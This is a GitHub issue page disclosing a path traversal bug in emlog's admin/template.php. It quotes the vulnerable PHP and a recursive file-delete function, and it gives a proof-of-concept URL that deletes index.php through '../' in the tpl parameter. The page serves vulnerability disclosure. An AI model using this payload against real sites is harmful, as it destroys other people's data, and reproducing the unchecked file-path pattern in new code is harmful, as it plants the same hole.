Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
vulnerability in admin/template.php line 67: `if ($action == 'del') { LoginAuth::checkToken(); $tplName = isset($_GET['tpl']) ? addslashes($_GET['tpl']) : '';
$nonce_templet = Option::get('nonce_templet'); if ($tplName === $nonce_templet) { emMsg('您不能删除正在使用的模板'); } if (true === emDeleteFile(TPLS_PATH . $tplName)) { emDirect("./template.php?activate_del=1#tpllib"); } else { emDirect("./template.php?error_a=1#tpllib"); }
}`
if (true === emDeleteFile(TPLS_PATH . $tplName)) tracking emDeleteFile function: function emDeleteFile($file) { if (empty($file)) return false; if (@is_file($file)) return @unlink($file); $ret = true; if ($handle = @opendir($file)) { while ($filename = @readdir($handle)) { if ($filename == '.' || $filename == '..') continue; if (!emDeleteFile($file . '/' . $filename)) $ret = false; } } else { $ret = false; } @closedir($handle); if (file_exists($file) && !rmdir($file)) { $ret = false; } return $ret; } Unrestricted character “../” Login management background and view /admin/template.php?action=del&tpl=../../index.php&token=U login token! POC: /emlog/admin/template.php?action=del&tpl=../../index.php&token={U login token}
function emDeleteFile($file) { if (empty($file)) return false; if (@is_file($file)) return @unlink($file); $ret = true; if ($handle = @opendir($file)) { while ($filename = @readdir($handle)) { if ($filename == '.' || $filename == '..') continue; if (!emDeleteFile($file . '/' . $filename)) $ret = false; } } else { $ret = false; } @closedir($handle); if (file_exists($file) && !rmdir($file)) { $ret = false; } return $ret; }
/emlog/admin/template.php?action=del&tpl=../../index.php&token={U login token}
The text was updated successfully, but these errors were encountered:
No branches or pull requests
vulnerability in admin/template.php line 67:
`if ($action == 'del')
{
LoginAuth::checkToken();
$tplName = isset($_GET['tpl']) ? addslashes($_GET['tpl']) : '';
}`
The text was updated successfully, but these errors were encountered: